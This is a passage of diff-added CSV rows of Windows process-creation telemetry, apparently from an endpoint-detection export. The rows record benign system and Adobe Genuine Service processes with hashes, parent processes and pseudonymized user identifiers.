+1149,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-25 01:16:07.552871500+00:00,14128,ClipRenew.exe,ClipRenew.exe,PortableExecutable,2019-12-07 09:10:06.398428700+00:00,C:\Windows\System32\ClipRenew.exe,152080,f9c43c85cb2068df7deb1c9d58046400,f6e6f9043a1ddb2028d7960e9269e174acbb54242099b0f6160e081dfbf564ce,f4ee9279f964e7349cde354b91e2440ccc226c7f,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:16:07.815523500+00:00,2021-06-25 01:17:01.555751200+00:00,36d410bf-611b-4264-9b0d-1aa766d62e65,computerpii_0a470890c60768167990033d701e7bd881398861,183111,False,10.7740.19041.1052,False,11540474045136925,,11540474045178694,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,svchost.exe,1768,256,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412828,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,Acquire License From Store,ClipRenew.exe,Acquire License From Store
+1150,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 07:23:20.012649+00:00,15268,SearchApp.exe,"""SearchApp.exe"" -ServerName:ShellFeedsUI.AppX88fpyyrd21w8wqe62wzsjh5agex7tf1e.mca",PortableExecutable,2021-06-09 01:21:18.392649+00:00,C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe,3403576,a2e28a0b40a5fb362b6b33612b76e8af,24f4282c6898dd4b85d4fafa52014362cbeff81f1ea433f2ba44717f2d6f1656,16928c207ee10878bc788a21e512df5fd6b6a826,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 07:23:20.124566700+00:00,2021-06-24 07:23:48.803586400+00:00,c26e9101-0e73-4d9f-b9d7-e1b3ff2d2022,computerpii_0a470890c60768167990033d701e7bd881398861,176962,False,10.7740.19041.1052,False,11540474045136908,,11540474045177086,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,SearchApp,SearchApp.exe,Search application
+1151,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 04:33:56.755355200+00:00,8832,DeviceEnroller.exe,"deviceenroller.exe /o ""280DE7BA-C92E-4BB4-BD1E-28942F50CF93"" /c /z",PortableExecutable,2021-04-14 01:10:22.237455+00:00,C:\Windows\System32\DeviceEnroller.exe,480256,669107f0f0daf359086d6f4349412f7b,06f7b0c17988cae5a622bdcc27667f771a06243fdf0a88f34981947d5d6bf8f9,588d272614a5522df8539ec8f5ef477b6dcf33d9,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 04:33:56.802969600+00:00,2021-06-23 04:35:00.230985+00:00,623c98fb-d1b5-495c-9fa2-2c32b469a626,computerpii_0a470890c60768167990033d701e7bd881398861,162728,False,10.7740.19041.1052,False,11540474045136925,,11540474045173458,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,API for MDM Enrollment,deviceenroller.exe,API for MDM Enrollment
+1152,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 06:20:42.081750+00:00,5908,AGCInvokerUtility.exe,"""AGCInvokerUtility.exe"" -mode=scheduled",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe,3412680,f7c8ef9fd17e2c89dc2770cca8db6242,eb8faf481eeafb6be3c1254b81a800f2c74fa7d8ab682cab5409bef44251b60f,696a27e0a254ea3c0b14368bfc5d7b4997d20711,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:20:42.655424700+00:00,2021-06-23 06:22:59.177905800+00:00,efd70abe-455f-43f7-b4d5-3075a580e16f,computerpii_0a470890c60768167990033d701e7bd881398861,163631,False,10.7740.19041.1052,False,11540474045136925,,11540474045173762,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,,,128.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,"Adobe Systems, Incorporated",GC Invoker Utility,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AGCInvokerUtility.exe,AGCInvokerUtility.exe,Adobe GC Invoker Utility
+1153,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 01:37:11.697145300+00:00,17896,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320851_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320851 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 01:37:11.773222+00:00,2021-06-25 01:37:48.398486200+00:00,a0bf7aa1-bd43-4a5c-9bd7-eb61f3d2504b,computerpii_0a470890c60768167990033d701e7bd881398861,183595,False,10.7740.19041.1052,False,11540474045144190,,11540474045178797,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+1154,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:03.079226200+00:00,9128,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_wjvmdf 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:03.119733300+00:00,2021-06-23 01:00:55.046188700+00:00,3aecf899-019f-4a15-9f2e-f6d2e5f21135,computerpii_0a470890c60768167990033d701e7bd881398861,155966,False,10.7740.19041.1052,False,11540474045136991,,11540474045172014,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,18560,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+1155,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:03.085114800+00:00,9460,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:00:03.078305+00:00,14812,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_jbksmo 3",False,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:03.120481600+00:00,2021-06-23 01:00:55.046286200+00:00,e433410c-2a93-47de-92b9-c56d7c577e68,computerpii_0a470890c60768167990033d701e7bd881398861,155967,False,10.7740.19041.1052,False,11540474045172013,,11540474045172015,2021-06-23 01:00:03.078305+00:00,14812,2021-06-23 01:00:03.078305+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,14812,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-23 01:00:03.102580200+00:00,2020-09-22 19:30:00+00:00,2304,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1156,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:03.086038800+00:00,2288,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:00:03.079226200+00:00,9128,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_wjvmdf 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:03.120658300+00:00,2021-06-23 01:00:55.046324700+00:00,6f41d037-557f-4b40-b67f-502594f2fba8,computerpii_0a470890c60768167990033d701e7bd881398861,155968,False,10.7740.19041.1052,False,11540474045172014,,11540474045172016,2021-06-23 01:00:03.079226200+00:00,9128,2021-06-23 01:00:03.079226200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,9128,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:46.229988300+00:00,2020-09-22 19:30:00+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1157,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:03.302818800+00:00,14192,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a17944"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a17944""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,323272,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:03.335858700+00:00,2021-06-23 01:00:55.046463600+00:00,2d25be39-c304-45ae-8388-6f7b210b284c,computerpii_0a470890c60768167990033d701e7bd881398861,155972,False,10.7740.19041.1052,False,11540474045136991,,11540474045172018,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,2176,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility
+1158,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:03.312194100+00:00,17444,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:00:03.302818800+00:00,14192,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a17944"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a17944""",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:03.336967400+00:00,2021-06-23 01:00:55.046530800+00:00,a6927db2-4a20-4252-a83e-9563ebfa07a2,computerpii_0a470890c60768167990033d701e7bd881398861,155974,False,10.7740.19041.1052,False,11540474045172018,,11540474045172020,2021-06-23 01:00:03.302818800+00:00,14192,2021-06-23 01:00:03.302818800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,14192,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:47.468786+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1159,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:00:03.358294100+00:00,14888,AdobeGCClient.exe,"""AdobeGCClient.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a17944"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a17944""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AdobeGCClient.exe,6743752,99b696fe03a14bd322f39fc35827e487,b57aab0a87e6c85ddf061a0a10bc10b96c61ae827fbb61f514a1df9fffcf263f,43d2475f42eeacb434b632975a33ebc8979a95b3,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:00:03.302818800+00:00,14192,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a17944"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a17944""",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:00:03.391054500+00:00,2021-06-23 